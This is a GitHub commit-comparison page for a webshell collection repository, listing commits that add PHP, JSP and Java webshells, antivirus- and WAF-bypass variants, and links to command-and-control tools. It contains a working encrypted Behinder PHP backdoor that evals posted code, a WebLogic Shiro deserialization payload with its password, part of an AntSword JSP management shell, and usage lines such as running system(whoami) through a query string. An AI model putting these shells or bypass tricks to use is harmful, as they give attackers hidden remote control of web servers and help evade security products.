PenTest/webshell
1
0
Fork 0
mirror of https://github.com/tennc/webshell.git synced 2025-12-09 14:11:30 +00:00
Code Issues Projects Releases Wiki Activity

Compare commits

base: PenTest:2020-08-18
Branches Tags
PenTest:master
PenTest:v-2021-01-05 PenTest:2020-08-18 PenTest:2020-04-04 PenTest:v-2017-04-19 PenTest:v-2016-03-05 PenTest:v-2015-07-20 PenTest:v-2015-03-04
...
compare: PenTest:v-2021-01-05
Branches Tags
PenTest:master
PenTest:v-2021-01-05 PenTest:2020-08-18 PenTest:2020-04-04 PenTest:v-2017-04-19 PenTest:v-2016-03-05 PenTest:v-2015-07-20 PenTest:v-2015-03-04

81 Commits
2020-08-18 ... v-2021-01-

Author SHA1 Message Date
tennc
9da9029fb0 Update README.md 2021-01-04 21:55:41 +08:00
tennc
8e77847595 add create_webshell_with_py.py @pureqh :💯 
Create webshell
from:https://mp.weixin.qq.com/s/s0piu9qU8oq6M1qAZCyI4g
github: https://github.com/pureqh/webshell
author: pureqh
 2021-01-04 21:54:14 +08:00
tennc
b59b949389 Create bypass-with-base32.php 2021-01-04 21:50:18 +08:00
tennc
eafae576c9 Create bypass2021-01-04-01.php 
from https://mp.weixin.qq.com/s/s0piu9qU8oq6M1qAZCyI4g
 2021-01-04 21:47:58 +08:00
tennc
a6546d03ee Create getConstants2.php 
use: xxx/webshell/1?<>=system(whoami)
from : https://xz.aliyun.com/t/8684
 2020-12-28 22:15:54 +08:00
tennc
fd35f195c1 Create getConstants.php 
use: xxxxxx/getConstants?1=phpinfo()
from : https://xz.aliyun.com/t/8684
 2020-12-28 01:08:19 +08:00
tennc
b66c3bb616 add YXNzZXJ0YWE.php bypass 啊D 
from: https://xz.aliyun.com/t/8684
 2020-12-28 01:05:10 +08:00
tennc
c9755402a6 add Webshell免杀的思考与学习.mhtml 
from : https://xz.aliyun.com/t/8684
author: Isabellae
 2020-12-28 01:02:49 +08:00
tennc
c7c6b39833 Create shell2020-12-06.php 
password:rebeyond
 2020-12-07 23:05:11 +08:00
tennc
f875e7b780 Create Shu1337.php 
from: https://github.com/linuxsec/shu-shell
@linuxsec 👍
 2020-11-18 22:20:42 +08:00
tennc
da33d92ba8 Update README_EN.md 2020-11-08 20:43:01 +08:00
tennc
9ef78d3996 Update README.md 2020-11-08 20:42:38 +08:00
tennc
9495a6c59e Rename README_ZH.md to README.md 2020-11-08 20:40:40 +08:00
tennc
0266c30801 Rename README.md to README_EN.md 2020-11-08 20:40:19 +08:00
tennc
9f63d98db5 Update README.md 2020-11-08 20:32:41 +08:00
tennc
e467712762 Create README_ZH.md 
add README_ZH.md
 2020-11-08 20:30:54 +08:00
tennc
3ffc1b6312 Merge pull request #40 from rubo77/patch-1 
Reame: translate to english
 2020-11-08 20:23:40 +08:00
Ruben Barkow-Kuder
fc276c0bb0 Reame: translate to english 
I used mainly Google translate, so I could have gotten some things wrong, please use this as a first stept to translate your Readme into english.

you could leave the original as `Readme_zn.md` if you like
 2020-11-07 14:27:28 +01:00
tennc
e9b09f671b Merge pull request #38 from RobinvandenHurk/patch-1 
Fixed label
 2020-10-22 23:26:08 +08:00
Robin van den Hurk
acb55c61bb Fixed label 2020-10-13 14:46:48 +02:00
tennc
7e6629ab49 Update README.md 2020-10-11 19:15:53 +08:00
tennc
7105ac90a5 Create get1.php 
use: "`****`"

from: 19e3e0ab25

@thephenix4 👍
 2020-10-11 19:11:12 +08:00
tennc
976ca14a7d Create webshell-without-alphanumeric2.php 
what ?? 
from: 3ea2d589ae

@oktavandi 👍
 2020-10-11 19:07:02 +08:00
tennc
823aa6ff59 add 冰蝎,从入门到魔改.pdf 2020-10-06 12:55:18 +08:00
tennc
67468c8243 add 冰蝎,从入门到魔改(续).pdf 2020-10-06 12:49:49 +08:00
tennc
df832d0366 Create cotent01.md 
from : https://blog.mrcl0wn.com/2019/01/hold-door-hold-backdoor-php.html
 2020-09-22 13:06:26 +08:00
tennc
dd21bebfc0 add some submodule webshell project to this project 2020-09-14 13:32:03 +08:00
tennc
25f1dc52ce Update README.md 2020-09-14 13:07:25 +08:00
tennc
222fc05087 Update README.md 2020-09-14 13:04:36 +08:00
tennc
ce94519fd0 Update README.md 
add some project webshell link
 2020-09-14 13:03:43 +08:00
tennc
31c6b56f25 Update other shell repository.md 2020-09-07 23:30:54 +08:00
tennc
5f3741952d Update and rename other shell repository to other shell repository.md 2020-09-07 23:30:07 +08:00
tennc
43d9582172 Create php_webshell.py 
create bypass safedog webshell  with python
from : https://github.com/pureqh/webshell
thanks to pureqh 👍
 2020-09-05 17:44:37 +08:00
tennc
0da00dfca4 add php马-bypass _ alin'Blog.pdf 
from : http://alin.run/2020/08/04/php-webshell-bypass/
 2020-09-03 21:08:06 +08:00
tennc
719eb9131d Create ass.php 
请求时,设置Referer头,后面以”ass****”结尾即可,比如:Referer: http://www.target.com/ass.php。
在使用Cknife时,注意软件实现有缺陷,会从第二个”:”处截断,可改成Referer: http%3a//www.target.com/ass.php
from : http://alin.run/2020/08/04/php-webshell-bypass/
 2020-09-03 21:00:49 +08:00
tennc
9fd273a5a5 Create webshell-detect-bypass 
from : LandGrey 👍
 2020-09-03 20:58:19 +08:00
tennc
aeaf7516dd add 从Webshell的视角谈攻防对抗.pdf 
from : https://www.freebuf.com/articles/network/247359.html
 2020-09-01 21:06:04 +08:00
tennc
3ab759a148 add Upload与WAF的那些事.pdf 
from : http://www.0x3.biz/archives/1925.html
 2020-09-01 21:01:53 +08:00
tennc
2bea3becb2 Create 2020-08-31-01.php 
from: https://github.com/clm123321/tongda_oa_rce/blob/master/tongda.py#L145
 2020-08-31 21:39:22 +08:00
tennc
a6acc071dd Delete CNAME 2020-08-30 15:16:02 +08:00
tennc
41e8490caf Delete CNAME 2020-08-30 15:14:38 +08:00
tennc
1f9390b340 Update CNAME 
rewrite cname
 2020-08-30 15:12:29 +08:00
tennc
e864fcd511 Create create_code_with_xor.py 
create some code for php xor to bypass safedog
from : https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
 2020-08-30 14:05:29 +08:00
tennc
105f3ed358 Update README.md 
add some project web site url
 2020-08-29 15:33:12 +08:00
tennc
a83d9cb7e9 Update README.md 
rewrite
 2020-08-29 15:27:36 +08:00
tennc
349039f2d5 Merge pull request #35 from nil0x42/patch-1 
Add `phpsploit` (C2 framework via PHP oneliner)
 2020-08-29 15:25:06 +08:00
tennc
a09c535f6d Create bt_yincang_shell.md 
from: https://mp.weixin.qq.com/s/-8JE1ovWKOorNr6MCAgejg
wx_id: 漏洞推送
 2020-08-29 14:59:27 +08:00
nil0x42
57d76f059e Add phpsploit (C2 framework via PHP oneliner) 
Add phpsploit tool (https://github.com/nil0x42/phpsploit):
Full-featured C2 framework which silently persists on webserver via evil PHP oneliner, with a complete asrenal of post-exploitation & privesc features
Ask me if you have any question 👍
 2020-08-26 17:15:11 +00:00
tennc
3fb8abd7c9 Create php_custom_script_for_mysql_fix.php 
fix php_custom_script_for_mysql_fix.php   乱码
 2020-08-26 22:48:48 +08:00
tennc
e458de3dc7 Create python2_custom_script.py 
add python2_custom_script.py
 2020-08-26 22:47:31 +08:00
tennc
efe66a8e7b Create jspx_custom_script_for_mysql.jspx 
add jspx_custom_script_for_mysql
 2020-08-26 22:46:46 +08:00
tennc
c6f42dd08c Create jsp_custom_script_for_oracle.jsp 
add jsp_custom_script_for_oracle.jsp
 2020-08-26 22:46:05 +08:00
tennc
eae7182ca9 Create WebLogic_Shiro.md 
thanks  Y4er
👍
 2020-08-26 22:37:49 +08:00
tennc
fef331e3f2 add Godzilla-BypassOpenRasp.jar 
add Godzilla-BypassOpenRasp.jar
 2020-08-25 20:31:48 +08:00
tennc
cd55a03046 add WebShell免杀.pdf 
add WebShell免杀.pdf
 2020-08-22 19:33:50 +08:00
tennc
61b8a65a49 add 1个经典的过人 WebShell.pdf 
add 1个经典的过人 WebShell.pdf
 2020-08-22 19:24:17 +08:00
tennc
5c86bc3410 Create readme.md 2020-08-22 19:23:35 +08:00
tennc
62ccee518b Create bypass.md 2020-08-22 19:22:26 +08:00
tennc
23aea8530d Create 2020.08.20.20.php 
maybe bypass safedog
from : https://www.sqlsec.com/2020/07/shell.html#toc-heading-24
 2020-08-21 19:52:22 +08:00
tennc
cbd7b8ef98 Create 2020.08.20.19.php 
bypass by safedog
https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 13:09:52 +08:00
tennc
12ad35eb0f Create 2020.08.20.18.php 
bypass safedog
https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 13:08:25 +08:00
tennc
0d1874b235 Create 2020.08.20.17.php 
killed by safedog
from : https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 13:07:32 +08:00
tennc
cd1e25025a Create 2020.08.20.16.php 
from : https://www.sqlsec.com/2020/07/shell.html
killed by safedog
 2020-08-20 13:03:10 +08:00
tennc
ecc1fb09ee Create 2020.08.20.15.php 
use:
shell.php?e=mb_eregi_replace
post x=phpinfo();
 2020-08-20 12:48:04 +08:00
tennc
6a9169da6b Create 2020.08.20.14.php 2020-08-20 12:40:40 +08:00
tennc
44282fe412 Create 2020.08.20.13.php 
shell.php?e=preg_replace ==> preg_replace('|.*|e',$_POST['x'],'')
use:  post x=phpinfo();
from: https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 12:38:26 +08:00
tennc
aeb2db1e19 Create 2020.08.20.12.php 
from : https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 12:35:58 +08:00
tennc
f7c1551c7f Create 2020.08.20.11.php 
from : https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 12:34:54 +08:00
tennc
accce9acef Create 2020.08.20.10.php 
from : https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 12:34:25 +08:00
tennc
63217f585d Create 2020.08.20.09.php 
from : https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 12:33:34 +08:00
tennc
69b4a7b5bc Create 2020.08.20.08.php 
from : https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 12:32:56 +08:00
tennc
a700c2b3d8 Create 2020.08.20.07.php 
from : https://www.sqlsec.com/2020/07/shell.html
killled by safedog
 2020-08-20 12:32:12 +08:00
tennc
d5f61a9c5f Create 2020.08.20.06.php 
from : https://www.sqlsec.com/2020/07/shell.html
killed by safedog
 2020-08-20 12:31:23 +08:00
tennc
d8cdd62ab1 Create 2020.08.20.05.php 
from : https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 12:30:06 +08:00
tennc
223d57c52c Create 2020.08.20.04.php 
from : https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 12:29:26 +08:00
tennc
6759fd8dcc Create 2020.08.20.03.php 
from : https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 12:28:46 +08:00
tennc
51833ad9b6 Create 2020.08.20.02.php 
from : https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 12:27:40 +08:00
tennc
820aadc6a1 Create 2020.08.20.01.php 
from : https://www.sqlsec.com/2020/07/shell.html
 2020-08-20 12:26:04 +08:00
tennc
5a94f3e98b add Behinder_v3.0_Beta_1.zip 2020-08-19 22:19:34 +08:00
tennc
457530e937 Update README.md 2020-08-19 22:09:48 +08:00
tennc
74b1f33dbe add Godzilla client 2020-08-19 12:52:10 +08:00
83 changed files with 82781 additions and 88 deletions
Expand all files Collapse all files

60
.gitmodules vendored Normal file
View File

@@ -0,0 +1,60 @@
[submodule "xl7dev/WebShell"]
path = xl7dev/WebShell
url = https://github.com/xl7dev/WebShell
[submodule "JohnTroony/php-webshells"]
path = JohnTroony/php-webshells
url = https://github.com/JohnTroony/php-webshells
[submodule "BlackArch/webshells"]
path = BlackArch/webshells
url = https://github.com/BlackArch/webshells
[submodule "LandGrey/webshell-detect-bypass"]
path = LandGrey/webshell-detect-bypass
url = https://github.com/LandGrey/webshell-detect-bypass
[submodule "JoyChou93/webshell"]
path = JoyChou93/webshell
url = https://github.com/JoyChou93/webshell
[submodule "bartblaze/PHP-backdoors"]
path = bartblaze/PHP-backdoors
url = https://github.com/bartblaze/PHP-backdoors
[submodule "WangYihang/Webshell-Sniper"]
path = WangYihang/Webshell-Sniper
url = https://github.com/WangYihang/Webshell-Sniper
[submodule "threedr3am/JSP-Webshells"]
path = threedr3am/JSP-Webshells
url = https://github.com/threedr3am/JSP-Webshells
[submodule "DeEpinGh0st/PHP-bypass-collection"]
path = DeEpinGh0st/PHP-bypass-collection
url = https://github.com/DeEpinGh0st/PHP-bypass-collection
[submodule "lcatro/PHP-WebShell-Bypass-WAF"]
path = lcatro/PHP-WebShell-Bypass-WAF
url = https://github.com/lcatro/PHP-WebShell-Bypass-WAF
[submodule "ysrc/webshell-sample"]
path = ysrc/webshell-sample
url = https://github.com/ysrc/webshell-sample
[submodule "tanjiti/webshellSample"]
path = tanjiti/webshellSample
url = https://github.com/tanjiti/webshellSample
[submodule "webshellpub/awsome-webshell"]
path = webshellpub/awsome-webshell
url = https://github.com/webshellpub/awsome-webshell
[submodule "tdifg/WebShell"]
path = tdifg/WebShell
url = https://github.com/tdifg/WebShell
[submodule "malwares/WebShell"]
path = malwares/WebShell
url = https://github.com/malwares/WebShell
[submodule "lhlsec/webshell"]
path = lhlsec/webshell
url = https://github.com/lhlsec/webshell
[submodule "oneoneplus/webshell"]
path = oneoneplus/webshell
url = https://github.com/oneoneplus/webshell
[submodule "vnhacker1337/Webshell"]
path = vnhacker1337/Webshell
url = https://github.com/vnhacker1337/Webshell
[submodule "backlion/webshell"]
path = backlion/webshell
url = https://github.com/backlion/webshell
[submodule "AntSwordProject/AwesomeScript"]
path = AntSwordProject/AwesomeScript
url = https://github.com/AntSwordProject/AwesomeScript

1
AntSwordProject/AwesomeScript Submodule

Submodule AntSwordProject/AwesomeScript added at dbcc508338

BIN
Behinder/Behinder_v3.0_Beta_1.zip Normal file
View File

Binary file not shown.

26
Behinder/shell2020-12-06.php Normal file
View File

@@ -0,0 +1,26 @@
<?php
@error_reporting(0);
session_start();
$key="e45e329feb5d925b"; //该密钥为连接密码32位md5值的前16位默认连接密码rebeyond
$_SESSION['k']=$key;
$f=explode("|",base64_decode("ZmlsZV9nZXRfY29udGVudHN8YmFzZTY0X2RlY29kZXxwaHA6Ly9pbnB1dA=="));
$post=["bie"=>$f[0](end($f))];
$post=$post["bie"];
if(!extension_loaded('openssl'))
{
$post=$f[1]($post."");
for($i=0;$i<strlen($post);$i++) {
$post[$i] = $post[$i] xor $key[$i+1&15];
}
}
else
{
$post=openssl_decrypt($post, "AES128", $key);
}
$arr=explode('|',$post);
$func=$arr[0];
$params=$arr[1];
class C{public function __invoke($p) {eval($p."");}}
@call_user_func(new C(),$params);
?>

1
BlackArch/webshells Submodule

Submodule BlackArch/webshells added at 0701fcb26c

1
CNAME
View File

@@ -1 +0,0 @@
shell.endp.top

1
DeEpinGh0st/PHP-bypass-collection Submodule

Submodule DeEpinGh0st/PHP-bypass-collection added at 8d1e82f008

BIN
Godzilla/Godzilla-BypassOpenRasp.jar Normal file
View File

Binary file not shown.

BIN
Godzilla/gesila.7z Normal file
View File

Binary file not shown.

1
JohnTroony/php-webshells Submodule

Submodule JohnTroony/php-webshells added at 226a15d068

1
JoyChou93/webshell Submodule

Submodule JoyChou93/webshell added at 2185acc2b4

1
LandGrey/webshell-detect-bypass Submodule

Submodule LandGrey/webshell-detect-bypass added at 54c33e525f

39
README.md
View File

@@ -1,5 +1,5 @@
webshell
========
# webshell | [English](https://github.com/tennc/webshell/blob/master/README_EN.md)
这是一个webshell收集项目
送人玫瑰手有余香如果各位下载了本项目也请您能提交shell
@@ -23,10 +23,11 @@
> 2. 免杀webshell无限生成工具
> 3. 免杀webshell无限生成工具(免杀一句话生成|免杀D盾|免杀安全狗护卫神河马查杀等一切waf)
> 4. Author : yzddmr6
> 5. 请自行鉴别
> 5. https://github.com/pureqh/webshell
> 6. 请自行鉴别后门
> ### other webshell project (old)
> ### other webshell project (update 2020-09-14)
> 1. [xl7dev/WebShell](https://github.com/xl7dev/WebShell)
> 2. [JohnTroony/php-webshells](https://github.com/JohnTroony/php-webshells)
> 3. [BlackArch/webshells](https://github.com/BlackArch/webshells)
@@ -34,20 +35,34 @@
> 5. [JoyChou93/webshell](https://github.com/JoyChou93/webshell)
> 6. [bartblaze/PHP-backdoors](https://github.com/bartblaze/PHP-backdoors)
> 7. [WangYihang/Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper)
> 8. [threedr3am/JSP-Webshells](https://github.com/threedr3am/JSP-Webshells)
> 9. [DeEpinGh0st/PHP-bypass-collection](https://github.com/DeEpinGh0st/PHP-bypass-collection)
> 10. [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF)
> 11. [ysrc/webshell-sample](https://github.com/ysrc/webshell-sample)
> 12. [tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
> 13. [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell)
> 14. [tdifg/WebShell](https://github.com/tdifg/WebShell)
> 15. [malwares/WebShell](https://github.com/malwares/WebShell)
> 16. [lhlsec/webshell](https://github.com/lhlsec/webshell)
> 17. [oneoneplus/webshell](https://github.com/oneoneplus/webshell)
> 18. [vnhacker1337/Webshell](https://github.com/vnhacker1337/Webshell)
> 19. [backlion/webshell](https://github.com/backlion/webshell)
> ### 顺便在推一波网站管理工具
> 1. 中国菜刀
> 2. Cknife
> 3. Altman
> 3. [Altman](https://github.com/keepwn/Altman)
> 4. xise
> 5. Weevely
> 6. quasibot
> 7. Webshell-Sniper
> 8. 蚁剑
> 9. 冰蝎
> 10. webacoo
> 11. 以上排名不分先后
> 5. [Weevely](https://github.com/epinna/weevely3)
> 6. [quasibot](https://github.com/Smaash/quasibot)
> 7. [Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper)
> 8. [蚁剑 antSword](https://github.com/AntSwordProject/antSword)
> 9. [冰蝎 Behinder](https://github.com/rebeyond/Behinder)
> 10. [webacoo](https://github.com/anestisb/WeBaCoo)
> 11. [哥斯拉 Godzilla](https://github.com/BeichenDream/Godzilla)
> 12. [PhpSploit](https://github.com/nil0x42/phpsploit)
> 13. 以上排名不分先后

82
README_EN.md Normal file
View File

@@ -0,0 +1,82 @@
webshell
[简体中文](https://github.com/tennc/webshell/blob/master/README.md)
========
This is a webshell collection project
*Give someone a rose, there is a fragrance in your hand*
if you download this project, please also submit a shell
This project covers various common scripts
Such as: asp, aspx, php, jsp, pl, py
If you submit a webshell, please do not change the name and password
Note: There is no guarantee whether there could be a backdoor in a shell, but I will never add a backdoor deliberately when uploading by myself
Please dont add a backdoor if you submit
If you find a backdoor code, please create an issue immediately!
The tools provided by this project are forbidden to engage in illegal activities. This project is for testing purposes only. All the consequences caused by it have nothing to do with me.
> ### Expanding a project
> 1. [webshell-venom](https://github.com/yzddmr6/webshell-venom)
> 2. Kill-free webshell unlimited generation tool
> 3. Kill-free webshell unlimited generation tool (Kill-free one sentence generation|Kill-free D shield|Kill-free security dog guard God Hippo check and kill everything waf)
> 4. Author : yzddmr6
> 5. Please identify yourself
> ### other webshell project (update 2020-09-14)
> 1. [xl7dev/WebShell](https://github.com/xl7dev/WebShell)
> 2. [JohnTroony/php-webshells](https://github.com/JohnTroony/php-webshells)
> 3. [BlackArch/webshells](https://github.com/BlackArch/webshells)
> 4. [LandGrey/webshell-detect-bypass](https://github.com/LandGrey/webshell-detect-bypass)
> 5. [JoyChou93/webshell](https://github.com/JoyChou93/webshell)
> 6. [bartblaze/PHP-backdoors](https://github.com/bartblaze/PHP-backdoors)
> 7. [WangYihang/Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper)
> 8. [threedr3am/JSP-Webshells](https://github.com/threedr3am/JSP-Webshells)
> 9. [DeEpinGh0st/PHP-bypass-collection](https://github.com/DeEpinGh0st/PHP-bypass-collection)
> 10. [lcatro/PHP-WebShell-Bypass-WAF](https://github.com/lcatro/PHP-WebShell-Bypass-WAF)
> 11. [ysrc/webshell-sample](https://github.com/ysrc/webshell-sample)
> 12. [tanjiti/webshellSample](https://github.com/tanjiti/webshellSample)
> 13. [webshellpub/awsome-webshell](https://github.com/webshellpub/awsome-webshell)
> 14. [tdifg/WebShell](https://github.com/tdifg/WebShell)
> 15. [malwares/WebShell](https://github.com/malwares/WebShell)
> 16. [lhlsec/webshell](https://github.com/lhlsec/webshell)
> 17. [oneoneplus/webshell](https://github.com/oneoneplus/webshell)
> 18. [vnhacker1337/Webshell](https://github.com/vnhacker1337/Webshell)
> 19. [backlion/webshell](https://github.com/backlion/webshell)
> ### By the way, we are pushing a wave of website management tools
> 1. Chinese Kitchen Knife
> 2. Cknife
> 3. [Altman](https://github.com/keepwn/Altman)
> 4. xise
> 5. [Weevely](https://github.com/epinna/weevely3)
> 6. [quasibot](https://github.com/Smaash/quasibot)
> 7. [Webshell-Sniper](https://github.com/WangYihang/Webshell-Sniper)
> 8. [蚁剑 antSword](https://github.com/AntSwordProject/antSword)
> 9. [冰蝎 Behinder](https://github.com/rebeyond/Behinder)
> 10. [webacoo](https://github.com/anestisb/WeBaCoo)
> 11. [哥斯拉 Godzilla](https://github.com/BeichenDream/Godzilla)
> 12. [PhpSploit](https://github.com/nil0x42/phpsploit)
> 13. The above rankings are in no particular order
Author tennc
http://tennc.github.io/webshell
license : GPL v3
## Download link
Check github releases. Latest:
[https://github.com/tennc/webshell/releases](https://github.com/tennc/webshell/releases)
## Sponsored by Jetbrains
## <img src="https://raw.githubusercontent.com/tennc/webshell/master/jetbrains.png" width="400"> Thanks to [Jetbrains](https://www.jetbrains.com/?from=webshell)

1
WangYihang/Webshell-Sniper Submodule

Submodule WangYihang/Webshell-Sniper added at dc657fb1c5

15
antSword-shells/WebLogic_Shiro.md Normal file
View File

@@ -0,0 +1,15 @@
``` java
YWFhYWFhYWFhYWFhYWFhYW4WyDHgFb0DhQAQ46Kgw+r8soc6/b5FErU9nSlqEsyHJ8x4xnqm1ex86u/xBiUprKSOWmYZAMmwfWmzi9V1lvBG13cKgcZiHI6Kj0T69zzRdjvky4fgMZJy5IC1J5Dw8AFlea2PrRvslWyoPMxkYDXMCIQWOPYx4q6VXinkXP+3/hTU+VhQKzUdqbYj6w2DiQ6oqtZBYZdGD4YXq5YTrKpOHPyPex9EEvNxxZQGQcUgZD8+evRHXAcxCT/hTgsio2sGE7DkOB/PnnBhzm+1kJkEU6ePQoiD2GQA+lAVmLpQJEq4xlgg1HtVlQK7mCtSRU2vhroCHMtOFcQCz7u8yQ1hk0+da0IIf+QxsM0p78aWq8IYjk1wjzpxp8azJWvG0ao6ok9VdWXbJdC+c9yB5LySnNb7auijcGV54JODEx22BDsOVcN+vwyd3JBpfX+2KBur5jIIfc3kHRMRuJV9+LPoHDhoUVdUc5cismdzX2d0LJ9Ml+8l7LCAaenC2/GNgZJkzCpuZ/jvEfGVyCuLMK1KQM0eeW7beOojIcDXT6jrAn4Ys0gMThu05TWjQHM+fXDczE6Eb6dO5x9tOROFI0gcqzjmRage7xXM2xHykzej6CuiP6eJb+qKND244YgFN9gkAQqgkyscLcV0Ds6EldEct7uhzQfM1upktzWwsdrY1qVSmuMt1T8UzW/+hZoYgvxAh4F7jsSHuTPtoLoC36OK6PnooZUvKlmQtOCe05hIKpXoc9wXXh1EWJE5RXFrU34LMbsEjZH5e1GY8e9/xDxbRfNnBCfgpUH2rlPo0fUP0gdexpMLU9V/HDOBOxuQWLxRHvX3bpW3CF+cvYOJHtz9x6Y7Qa3NQxtkv1qrcddYXQdqO52sGjGvYCo6OyYsJm1vYnaqccVtsm/85VmCjAGu8QkP5tK3P8jr5K9pVdSEgAECTxYt/XRp/3baKCAPbLY1ibmR63y+0lBC+krW/p22CdpKq11r2ZxVVSEmaCBl4LgbYi1wk+rZFv1Io4CSr/R9PBFjlkvsCl2PSXC+VLA6YZt2d9u1F0uXC5VHhnTJaZ35lPBUTGT9BBvveDDW99CCmQa9htKNDwAsZnlyghFAPheH9N5J729NVrWXbrbUa1tl/Eh7rzA3SriFFZ9LhlGH68ksuCaUesi1+S0hh+aL7sXpKuxEVFK5yY1a3FHCjxeP1C29QAqgulzAJ5Lm6xjQ7Nb2lo5FfHMMO4kipou6gFlA5dhyholnB4wCzxy+V0UA5uY1kqxooLa5mUs+l5Xn8k+XWuhzZ/1OLLwlc5BEZ4qAdI77i4kkVhvr21lK5DoKhBMgl/5Sv+1k7TbgyTYa5Xvk1c7Sf0v7MCDeeSnFHElyLHW/LL7sgBXns4f9wy9tQWhafv3xqc5X+8ARY3QoP8bmV2AUpIeyWAvc1lS2Bf8juaQ6PKXTMPB5y6aTW2eDdCjDZLhrBj02qPt4A3l4uqBylZLSdeNFGSXrTPqiAADxGawk2TvKqRYn8oowS0SWeUngpR7GGGiqU/m8e3PUC/WepGQj0rdTFXqE5MJPd0a9BgQOew0uQfmKdbzstZr2j4on8lWYRmPLxpeooV7YvJL5mC3Xfo381OhOCEI5twD5MvXrUlSQpMH9+HISjWRxLzsC2njoXwiPbum39w==
```
pass: alsdkj1l24wqasd123
use: URLClassLoader -> tttt.jar -> InjectFilterShell static -> defineClass byte -> AntSwordFilterShell
![antshell](https://github.com/Y4er/WebLogic-Shiro-shell/raw/master/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96.assets/antshell.gif)
author:Y4er
project:https://github.com/Y4er/WebLogic-Shiro-shell

525
antSword-shells/jsp_custom_script_for_oracle.jsp Normal file
View File

@@ -0,0 +1,525 @@
<%--
_ ____ _
__ _ _ __ | |_/ ___|_ _____ _ __ __| |
/ _` | '_ \| __\___ \ \ /\ / / _ \| '__/ _` |
| (_| | | | | |_ ___) \ V V / (_) | | | (_| |
\__,_|_| |_|\__|____/ \_/\_/ \___/|_| \__,_|
———————————————————————————————————————————————
AntSword JSP Custom Script for Oracle
警告:
此脚本仅供合法的渗透测试以及爱好者参考学习
请勿用于非法用途,否则将追究其相关责任!
———————————————————————————————————————————————
说明:
1. AntSword >= v2.1.0
2. 创建 Shell 时选择 custom 模式连接
3. 数据库连接:
oracle.jdbc.driver.OracleDriver
jdbc:oracle:thin:@127.0.0.1:1521/test
user
password
注意以上是4行
4. 本脚本中 encoder/decoder 与 AntSword 添加 Shell 时选择的 encoder/decoder 要一致,如果选择 default 则需要将值设置为空
已知问题:
1. 文件管理遇到中文文件名显示的问题
ChangeLog:
v1.8
1. 修复由于decode函数与EC函数位置写反而导致的乱码问题
v1.7
1. 新增 AES 编码/解码 支持 (thx @Ch1ngg)
2. 新增 Version, 直接访问不带任何参数会返回当前 shell 的版本号
v1.6
1. 新增 4 种解码器支持
v1.5
1. 修正 base64 编码器下连接数据库 characterEncoding 出错
v1.4
1. 修正 windows 下基础路径获取盘符会出现小写的情况
v1.3
1. 修正上传文件超过1M时的bug
2. 修正weblogic war 包布署获取路径问题
3. 修正文件中文字符问题
Date: 2016/04/29 v1.2
1. 修正修改包含结束tag的文件会出错的 bug
Date: 2016/04/06 v1.1
1. 修正下载文件参数设置错误
2. 修正一些注释的细节
Date: 2016/03/26 v1
1. 文件系统 和 terminal 管理
2. mysql 数据库支持
3. 支持 base64 和 hex 编码
--%>
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*,javax.crypto.*,java.security.*,javax.crypto.spec.*" contentType="text/html;charset=UTF-8"%>
<%!
// #################################################################
String Pwd = "ant"; //连接密码
// 编码器
String encoder = ""; // default (明文)
// String encoder = "base64"; // base64
// String encoder = "hex"; // hex(推荐)
// String encoder = "aes"; // aes(加密方式见下文aes配置)
// 解码器
String decoder = ""; // default (明文)
// String decoder = "base64"; // base64 中文正常
// String decoder = "hex"; // hex 中文可能有问题
// String decoder = "hex_base64"; // hex(base64) // 中文正常
// String decoder = "aes_base64"; // aes(base64) (加密方式见下文aes配置)
// 其它配置
String cs = "UTF-8"; // 字符集编码
String SessionKey = "CUSTOMSESSID"; // 自定义sessionkey id
String RetS = "LT58"; // 数据起始分割符 base64
String RetE = "fDwt"; // 数据结束分割符 base64
// aes 加密配置项
/*
* aes-128-cfb_zero_padding:
* - aes_mode: CFB
* - aes_padding: NoPadding
* - aes_keylen: 16
* aes-256-ecb_zero_padding:
* - aes_mode: ECB
* - aes_padding: NoPadding
* - aes_keylen: 32
*/
// 注意: 以下4项为 encoder/decoder 共用
// 如果需要请求和返回采用不同方式, 自行修改
String aes_mode = "CFB"; // CBC|ECB|CFB|
String aes_padding = "NoPadding"; // NoPadding|PKCS5Padding|PKCS7Padding
int aes_keylen = 16; // 16|32 // 16(AES-128) 32(AES-256)
String aes_key_padding = "a"; // 获取到的 key 位数不够时填充字符
// ################################################################
String AesKey = "";
String Version = "1.7";
String EC(String s) throws Exception {
if(encoder.equals("hex") || encoder == "hex") return s;
return new String(s.getBytes(), cs);
}
String showDatabases(String encode, String conn) throws Exception {
String sql = "SELECT USERNAME FROM ALL_USERS ORDER BY 1";
String columnsep = "\t";
String rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
String showTables(String encode, String conn, String dbname) throws Exception {
String sql = "SELECT TABLE_NAME FROM (SELECT TABLE_NAME FROM ALL_TABLES WHERE OWNER='"+dbname+"' ORDER BY 1)";
String columnsep = "\t";
String rowsep = "";
return executeSQL(encode, conn, sql, columnsep, rowsep, false);
}
String showColumns(String encode, String conn, String dbname, String table) throws Exception {
String columnsep = "\t";
String rowsep = "";
String sql = "select * from " + dbname + "." + table + " WHERE ROWNUM=0";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
String query(String encode, String conn, String sql) throws Exception {
String columnsep = "\t|\t";
String rowsep = "\r\n";
return executeSQL(encode, conn, sql, columnsep, rowsep, true);
}
String executeSQL(String encode, String conn, String sql, String columnsep, String rowsep, boolean needcoluname)
throws Exception {
String ret = "";
